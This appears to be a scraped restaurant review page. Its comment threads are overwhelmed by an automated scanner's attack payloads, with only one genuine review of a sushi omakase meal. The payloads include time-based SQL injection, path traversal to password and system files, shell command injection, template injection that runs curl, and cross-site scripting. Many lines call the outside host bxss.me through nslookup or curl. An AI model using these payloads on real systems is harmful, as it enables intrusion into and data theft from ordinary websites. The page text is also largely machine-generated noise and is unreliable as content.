\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
WEB-INF/web.xml
re: Eric Yu
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
WEB-INF\web.xml
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
'"
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
<!--
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
1
re: Eric Yu
1
re: Eric Yu
-1 OR 2+911-911-1=0+0+0+1 --
re: Eric Yu
-1 OR 3+911-911-1=0+0+0+1 --
re: Eric Yu
-1 OR 2+961-961-1=0+0+0+1
re: Eric Yu
-1 OR 3+961-961-1=0+0+0+1
re: Eric Yu
-1' OR 2+528-528-1=0+0+0+1 --
re: Eric Yu
-1' OR 3+528-528-1=0+0+0+1 --
re: Eric Yu
-1' OR 2+552-552-1=0+0+0+1 or 'Fr59lGaq'='
re: Eric Yu
-1' OR 3+552-552-1=0+0+0+1 or 'Fr59lGaq'='
re: Eric Yu
-1" OR 2+503-503-1=0+0+0+1 --
re: Eric Yu
-1" OR 3+503-503-1=0+0+0+1 --
re: Eric Yu
if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
1 waitfor delay '0:0:15' --
re: Eric Yu
vmZ1jHBW'; waitfor delay '0:0:15' --
re: Eric Yu
-5 OR 870=(SELECT 870 FROM PG_SLEEP(15))--
re: Eric Yu
-5) OR 177=(SELECT 177 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 330=(SELECT 330 FROM PG_SLEEP(15))--
re: Eric Yu
0CCJmUGG' OR 839=(SELECT 839 FROM PG_SLEEP(15))--
re: Eric Yu
x1BAL0Cr') OR 717=(SELECT 717 FROM PG_SLEEP(15))--
re: Eric Yu
HT38FkzZ')) OR 862=(SELECT 862 FROM PG_SLEEP(15))--
re: Eric Yu
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
1'"
re: Eric Yu
@@3bOmD
re: Eric Yu
1NQGDN9XC0
re: Eric Yu
response.write(9109592*9332672)
re: Eric Yu
'+response.write(9109592*9332672)+'
re: Eric Yu
"+response.write(9109592*9332672)+"
re: Eric Yu
../../../../../../../../../../../../../../etc/passwd
re: Eric Yu
<esi:include src="http://bxss.me/rpb.png"/>
re: Eric Yu
${9999552+9999048}
re: Eric Yu
../../../../../../../../../../../../../../windows/win.ini
re: Eric Yu
file:///etc/passwd
re: Eric Yu
../
re: Eric Yu
)
re: Eric Yu
!(()&&!|*|*|
re: Eric Yu
^(#$!@#$)(()))******
re: Eric Yu
redirtest.acx
re: Eric Yu
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Eric Yu
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Eric Yu
echo wpnxyn$()\ wnvlae\nz^xyu||a #' &echo wpnxyn$()\ wnvlae\nz^xyu||a #|" &echo wpnxyn$()\ wnvlae\nz^xyu||a #
re: Eric Yu
/etc/shells
re: Eric Yu
'.gethostbyname(lc('hiteo'.'ragloubnecc50.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(88).chr(110).chr(90).'
re: Eric Yu
&echo pnrfwq$()\ hvitqx\nz^xyu||a #' &echo pnrfwq$()\ hvitqx\nz^xyu||a #|" &echo pnrfwq$()\ hvitqx\nz^xyu||a #
re: Eric Yu
../../../../../../../../../../../../../../etc/shells
re: Eric Yu
".gethostbyname(lc("hitmr"."hfamscyg62fb7.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(65).chr(98).chr(87)."
re: Eric Yu
|echo edofgs$()\ ypmyew\nz^xyu||a #' |echo edofgs$()\ ypmyew\nz^xyu||a #|" |echo edofgs$()\ ypmyew\nz^xyu||a #
re: Eric Yu
c:/windows/win.ini
re: Eric Yu
gethostbyname(lc('hitwp'.'daixqumj742b4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(79).chr(98).chr(85)
re: Eric Yu
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Eric Yu
expr 9000811583 - 984044
re: Eric Yu
bxss.me
re: Eric Yu
(nslookup -q=cname hitfdmoqhrizo899fd.bxss.me||curl hitfdmoqhrizo899fd.bxss.me))
re: Eric Yu
Http://bxss.me/t/fit.txt
re: Eric Yu
$(nslookup -q=cname hituwyxnhxdogd6198.bxss.me||curl hituwyxnhxdogd6198.bxss.me)
re: Eric Yu
http://bxss.me/t/fit.txt?.jpg
re: Eric Yu
&nslookup -q=cname hituhlnviasixaba08.bxss.me&'\"`0&nslookup -q=cname hituhlnviasixaba08.bxss.me&`'
re: Eric Yu
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Eric Yu
&(nslookup -q=cname hitorugtapdyvce1f5.bxss.me||curl hitorugtapdyvce1f5.bxss.me)&'\"`0&(nslookup -q=cname hitorugtapdyvce1f5.bxss.me||curl hitorugtapdyvce1f5.bxss.me)&`'
re: Eric Yu
';print(md5(31337));$a='
re: Eric Yu
|(nslookup -q=cname hitivuusdrsfy28cef.bxss.me||curl hitivuusdrsfy28cef.bxss.me)
re: Eric Yu
";print(md5(31337));$a="
re: Eric Yu
`(nslookup -q=cname hithzqtxljtpf8f444.bxss.me||curl hithzqtxljtpf8f444.bxss.me)`
re: Eric Yu
${@print(md5(31337))}
re: Eric Yu
;(nslookup -q=cname hitxoluyjiope37779.bxss.me||curl hitxoluyjiope37779.bxss.me)|(nslookup -q=cname hitxoluyjiope37779.bxss.me||curl hitxoluyjiope37779.bxss.me)&(nslookup -q=cname hitxoluyjiope37779.bxss.me||curl hitxoluyjiope37779.bxss.me)
re: Eric Yu
${@print(md5(31337))}\
re: Eric Yu
|(nslookup${IFS}-q${IFS}cname${IFS}hitldkbyenxtka5ba0.bxss.me||curl${IFS}hitldkbyenxtka5ba0.bxss.me)
re: Eric Yu
'.print(md5(31337)).'
re: Eric Yu
HttP://bxss.me/t/xss.html?%00
re: Eric Yu
&(nslookup${IFS}-q${IFS}cname${IFS}hitlealdrmiqhddd07.bxss.me||curl${IFS}hitlealdrmiqhddd07.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitlealdrmiqhddd07.bxss.me||curl${IFS}hitlealdrmiqhddd07.bxss.me)&`'
re: Eric Yu
bxss.me/t/xss.html?%00
re: Eric Yu
'"()
re: Eric Yu
'&&sleep(27*1000)*ttxupq&&'
re: Eric Yu
"+"A".concat(70-3).concat(22*4).concat(120).concat(77).concat(103).concat(81)+(require"socket"
Socket.gethostbyname("hitdu"+"qwjwgcyf4ec84.bxss.me.")[3].to_s)+"
re: Eric Yu
"&&sleep(27*1000)*txzlbg&&"
re: Eric Yu
'+'A'.concat(70-3).concat(22*4).concat(103).concat(66).concat(97).concat(74)+(require'socket'
Socket.gethostbyname('hitgu'+'yyacukpc09d30.bxss.me.')[3].to_s)+'
re: Eric Yu
'||sleep(27*1000)*etdize||'
re: Eric Yu
'A'.concat(70-3).concat(22*4).concat(113).concat(79).concat(116).concat(65)+(require'socket'
Socket.gethostbyname('hitmk'+'qamkuxas444ad.bxss.me.')[3].to_s)
re: Eric Yu
"||sleep(27*1000)*xsoiji||"
re: Eric Yu
replies
re: Eric Yu
'"
re: Eric Yu
replies�
re: Eric Yu
<!--
re: Eric Yu
replies/.
re: Eric Yu
'"()&%<zzz><ScRiPt >kas1(9388)</ScRiPt>
re: Eric Yu
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitogxwqrwzzt0371a.bxss.me")}}
re: Eric Yu
'"()&%<zzz><ScRiPt >kas1(9721)</ScRiPt>
re: Eric Yu
9305061
re: Eric Yu
rpuz3g90
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
*1
re: Eric Yu
-1 OR 5*5=25 --
re: Eric Yu
-1 OR 5*5=26 --
re: Eric Yu
-1 OR 5*5=25
re: Eric Yu
-1 OR 5*5=26
re: Eric Yu
*if(now()=sysdate(),sleep(15),0)
re: Eric Yu
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Eric Yu
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Eric Yu
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Eric Yu
-1; waitfor delay '0:0:15' --
re: Eric Yu
-1); waitfor delay '0:0:15' --
re: Eric Yu
-1 waitfor delay '0:0:15' --
re: Eric Yu
lJypC3fz'; waitfor delay '0:0:15' --
re: Eric Yu
-1 OR 341=(SELECT 341 FROM PG_SLEEP(15))--
re: Eric Yu
-1) OR 780=(SELECT 780 FROM PG_SLEEP(15))--
re: Eric Yu
-1)) OR 514=(SELECT 514 FROM PG_SLEEP(15))--
re: Eric Yu
oyjrGkoq' OR 368=(SELECT 368 FROM PG_SLEEP(15))--
re: Eric Yu
2k85zQQN') OR 32=(SELECT 32 FROM PG_SLEEP(15))--
re: Eric Yu
vshujBs9')) OR 147=(SELECT 147 FROM PG_SLEEP(15))--
re: Eric Yu
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Eric Yu
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Eric Yu
'||(select 1 from (select pg_sleep(15))x)||'
re: Eric Yu
''||(select 1 from (select pg_sleep(15))x)||''
re: Eric Yu
'"
re: Eric Yu
@@cwfa1
re: Eric Yu
(select 198766*667891)
re: Eric Yu
(select 198766*667891 from DUAL)
Just revisited yesterday. Very easy to reserve for those who have been there before.
Ikura was one of the starting pieces of nigiri and it somehow felt less magical compared to the previous time.
As expected, uni and toro(esp senaka) still unbelievably good. Ajibozushi, nodoguro don with dashi added in halfway, kurumaebi don, akagai and anago were very good.
Price has not increased since pre-covid (30k omakase before tax), but resultingly the number of tsumami has decreased.
The flow has been somewhat slower, it took 2.5hrs for the whole meal.
Would still highly recommend this place for a fancy meal, but lower inclination to revisit due to the long distance from Tokyo.
re: Yee How
jgKx2nad
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+20-20-1=0+0+0+1
re: Yee How
-1 OR 3+20-20-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
OsE1IHa3'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 489=(SELECT 489 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--
re: Yee How
WyADnZOC' OR 765=(SELECT 765 FROM PG_SLEEP(15))--
re: Yee How
XNL35OmY') OR 46=(SELECT 46 FROM PG_SLEEP(15))--
re: Yee How
6esuYpTD')) OR 293=(SELECT 293 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@FOZnB
re: Yee How
6pormLIR
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+484-484-1=0+0+0+1
re: Yee How
-1 OR 3+484-484-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
Sp16TXpq'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 374=(SELECT 374 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 329=(SELECT 329 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 316=(SELECT 316 FROM PG_SLEEP(15))--
re: Yee How
NzYNIG0C' OR 331=(SELECT 331 FROM PG_SLEEP(15))--
re: Yee How
76TJsJKg') OR 362=(SELECT 362 FROM PG_SLEEP(15))--
re: Yee How
Yd7CVkav')) OR 700=(SELECT 700 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@MvpGO
re: Yee How
1K2gFoGeYO
re: Yee How
response.write(9971384*9458315)
re: Yee How
'+response.write(9971384*9458315)+'
re: Yee How
"+response.write(9971384*9458315)+"
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
%0abcc:074625.67-22289.67.59267.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
to@example.com>%0d%0abcc:074625.67-22290.67.59267.19990.2@bxss.me
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
echo wlwxec$()\ jxcxpy\nz^xyu||a #' &echo wlwxec$()\ jxcxpy\nz^xyu||a #|" &echo wlwxec$()\ jxcxpy\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
&echo rqgxfw$()\ bnlinn\nz^xyu||a #' &echo rqgxfw$()\ bnlinn\nz^xyu||a #|" &echo rqgxfw$()\ bnlinn\nz^xyu||a #
re: Yee How
%2fetc%2fpasswd
re: Yee How
|echo sdslgi$()\ zpcrcz\nz^xyu||a #' |echo sdslgi$()\ zpcrcz\nz^xyu||a #|" |echo sdslgi$()\ zpcrcz\nz^xyu||a #
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
(nslookup hitptecvuihnv3937e.bxss.me||perl -e "gethostbyname('hitptecvuihnv3937e.bxss.me')")
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
$(nslookup hitcprdvmwamyaccab.bxss.me||perl -e "gethostbyname('hitcprdvmwamyaccab.bxss.me')")
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Yee How
&nslookup hitqonmntgach96451.bxss.me&'\"`0&nslookup hitqonmntgach96451.bxss.me&`'
re: Yee How
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Yee How
&(nslookup hitnpdalbyolo264f9.bxss.me||perl -e "gethostbyname('hitnpdalbyolo264f9.bxss.me')")&'\"`0&(nslookup hitnpdalbyolo264f9.bxss.me||perl -e "gethostbyname('hitnpdalbyolo264f9.bxss.me')")&`'
re: Yee How
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Yee How
|(nslookup hitouilxwfxpic4573.bxss.me||perl -e "gethostbyname('hitouilxwfxpic4573.bxss.me')")
re: Yee How
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Yee How
`(nslookup hitjchhafhmdf40650.bxss.me||perl -e "gethostbyname('hitjchhafhmdf40650.bxss.me')")`
re: Yee How
file:///etc/passwd
re: Yee How
;(nslookup hitaykyteulqj1e780.bxss.me||perl -e "gethostbyname('hitaykyteulqj1e780.bxss.me')")|(nslookup hitaykyteulqj1e780.bxss.me||perl -e "gethostbyname('hitaykyteulqj1e780.bxss.me')")&(nslookup hitaykyteulqj1e780.bxss.me||perl -e "gethostbyname('hitaykyteulqj1e780.bxss.me')")
re: Yee How
/\../\../\../\../\../\../\../etc/passwd
re: Yee How
/WEB-INF/web.xml
re: Yee How
C:\WINDOWS\system32\drivers\etc\hosts
re: Yee How
../../../../../../../../../../windows/win.ini%00.jpg
re: Yee How
/../../../../../../../../../../boot.ini
re: Yee How
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Yee How
..\..\..\..\..\..\..\..\windows\win.ini
re: Yee How
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Yee How
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Yee How
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Yee How
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\